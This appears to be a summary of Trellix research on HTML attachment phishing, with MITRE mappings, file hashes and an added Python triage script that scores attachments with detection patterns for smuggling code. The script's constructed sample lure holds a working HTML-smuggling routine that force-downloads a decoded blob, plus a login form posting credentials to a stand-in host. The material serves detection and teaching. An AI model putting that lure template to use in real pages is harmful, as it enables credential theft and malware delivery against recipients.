The Anatomy of HTML Attachment Phishing

HTML attachment phishing uses HTML-formatted email attachments, rather than links, to deliver malware and slip past email defenses that are tuned for URLs and executable attachments. The analysis explains how attackers pair these attachments with social engineering to get recipients to open them, giving the attacker payload delivery and initial access.
#HTMLAttachmentPhishing #TrellixResearch

Keypoints

  • HTML attachments are used in phishing emails to deliver malicious payloads rather than relying on links.
  • Attackers often rely on social engineering and spoofed sender cues to persuade victims to open the attachment.
  • The attachment may carry embedded scripts or HTML that fetch additional malicious components once it is rendered.
  • Payloads can be downloaded from remote servers or executed locally in the recipient's browser once the attachment is opened.
  • Defense recommendations emphasize restricting or blocking HTML attachments, detonating attachments in a sandbox before delivery, and training users to spot phishing cues.
  • The techniques aim to bypass conventional security controls that focus on links or executable attachments.
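The following static triage script is an added example, not code from the Trellix report: it applies the mechanics listed above (inline script, long base64 blobs decoded client-side, remote fetches) and the sandbox-or-block recommendation to a suspected HTML attachment without rendering it. The pattern list, the weights, the `triage` thresholds and the sample attachment (a dummy ZIP header, a reserved `.invalid` host) are all constructed for illustration.

```python
"""Static triage of a suspected HTML phishing attachment (added example)."""
import base64
import binascii
import hashlib
import re
from dataclasses import dataclass, field

# Heuristic markers of HTML smuggling / embedded-payload attachments. The list
# and weights are this example's own assumption, not Trellix's detection logic.
SUSPICIOUS_JS = {
    "atob":               (r"\batob\s*\(", 2),
    "blob":               (r"\bnew\s+Blob\s*\(", 2),
    "object_url":         (r"URL\.createObjectURL\s*\(", 2),
    "msSaveOrOpenBlob":   (r"msSaveOrOpenBlob\s*\(", 2),
    "download_attr":      (r"\.download\s*=", 1),
    "doc_write_unescape": (r"document\.write\s*\(\s*unescape\s*\(", 3),
    "fromCharCode":       (r"String\.fromCharCode\s*\(", 1),
    "eval":               (r"\beval\s*\(", 2),
    "remote_fetch":       (r"\b(?:fetch|XMLHttpRequest|location\.(?:href|replace))\b", 1),
    "meta_refresh":       (r"<meta[^>]+http-equiv\s*=\s*[\"']?refresh", 1),
}
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")   # long base64 run = embedded payload
URL_RE = re.compile(r"https?://[^\s\"'<>]+")
HTML_EXTS = (".html", ".htm", ".xhtml", ".shtml", ".mht", ".mhtml")


def sniff(data: bytes) -> str:
    """Identify a byte string by magic bytes (subset sufficient for this example)."""
    head = data.lstrip()[:16]
    if head.startswith(b"MZ"):
        return "PE executable"
    if head.startswith(b"PK\x03\x04"):
        return "ZIP archive"
    if head.startswith(b"%PDF"):
        return "PDF"
    if head.startswith(b"\xd0\xcf\x11\xe0"):
        return "OLE (legacy Office)"
    if head.lower().startswith((b"<html", b"<!doctype")):
        return "HTML"
    return "unknown"


@dataclass
class Verdict:
    md5: str
    sha256: str
    hits: list = field(default_factory=list)    # matched SUSPICIOUS_JS keys, in dict order
    blobs: list = field(default_factory=list)   # decoded base64 payloads found inline
    urls: list = field(default_factory=list)    # remote endpoints referenced by the file
    score: int = 0


def analyze(html: str) -> Verdict:
    """Score an HTML attachment statically; nothing in it is executed."""
    raw = html.encode("utf-8")
    v = Verdict(md5=hashlib.md5(raw).hexdigest(), sha256=hashlib.sha256(raw).hexdigest())
    for name, (pattern, weight) in SUSPICIOUS_JS.items():
        if re.search(pattern, html, re.I):
            v.hits.append(name)
            v.score += weight
    for m in B64_BLOB.finditer(html):
        try:
            decoded = base64.b64decode(m.group(0), validate=True)
        except binascii.Error:
            continue                          # not real base64 (e.g. a long token)
        kind = sniff(decoded)
        v.blobs.append({"offset": m.start(), "length": len(decoded), "type": kind})
        v.score += 5 if kind in ("PE executable", "ZIP archive", "OLE (legacy Office)") else 2
    v.urls = sorted(set(URL_RE.findall(html)))
    return v


def triage(filename: str, content: bytes, block_at: int = 5) -> tuple:
    """Mail-gateway policy hook: HTML attachments are sandboxed by default and
    blocked outright when static scoring already shows smuggling behaviour.
    Content sniffing catches HTML renamed to another extension. Threshold is assumed."""
    if not (filename.lower().endswith(HTML_EXTS) or sniff(content) == "HTML"):
        return "deliver", "not an HTML attachment"
    v = analyze(content.decode("utf-8", "replace"))
    if v.score >= block_at:
        return "block", f"score {v.score}; hits={v.hits}; blobs={[b['type'] for b in v.blobs]}"
    return "sandbox", f"score {v.score}; detonate before delivery"


# Constructed sample attachment (not a real-world artefact): a lure page that
# decodes an inline base64 "ZIP" (dummy header plus zero bytes) and force-downloads it.
_FAKE_ZIP = base64.b64encode(b"PK\x03\x04" + b"\x00" * 180).decode()
SAMPLE_ATTACHMENT = f"""<html><body>
<p>Your invoice is ready. Please sign in to view it.</p>
<form action="https://example.invalid/login" method="post">
  <input name="email"><input name="password" type="password"></form>
<script>
var b = atob("{_FAKE_ZIP}");
var bytes = new Uint8Array(b.length);
for (var i = 0; i < b.length; i++) bytes[i] = b.charCodeAt(i);
var blob = new Blob([bytes], {{type: "application/zip"}});
var a = document.createElement("a");
a.href = URL.createObjectURL(blob); a.download = "Invoice_4471.zip"; a.click();
</script></body></html>"""

if __name__ == "__main__":
    print(triage("invoice.html", SAMPLE_ATTACHMENT.encode()))
```

The decode step matters more than the regex hits: a base64 run that sniffs as PE, ZIP or OLE is the strongest single signal that the file is a dropper rather than a plain credential page, and it is also what a sandbox would have to wait for the browser to materialise.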

MITRE Techniques

  • [T1566.001] Phishing: Spearphishing Attachment – HTML attachments used to deliver malicious payloads via email and bypass some defenses. Quote: ‘HTML attachments are used to deliver payloads and bypass security controls.’
  • [T1059.007] Command and Scripting Interpreter: JavaScript – Embedded JavaScript within the attachment runs in the recipient's browser when the file is opened locally. Quote: ‘Embedded script in the attachment executes automatically when opened.’
  • [T1027] Obfuscated Files or Information – Payloads are obfuscated or encoded to evade detection. Quote: ‘The payload is obfuscated to bypass security checks.’
  • [T1105] Ingress Tool Transfer – The attachment may cause the system to download the actual payload from a remote server. Quote: ‘Payload is downloaded from a remote server after opening the attachment.’

Indicators of Compromise

  • [File hash (MD5)] HTML attachment samples – d96e5c5dcea235e9c09c0888e599ec65, d24f61d477b1316c6def56884c37e2b8, and 2 more hashes

Read more: https://www.trellix.com/en-us/about/newsroom/stories/research/the-anatomy-of-html-attachment-phishing.html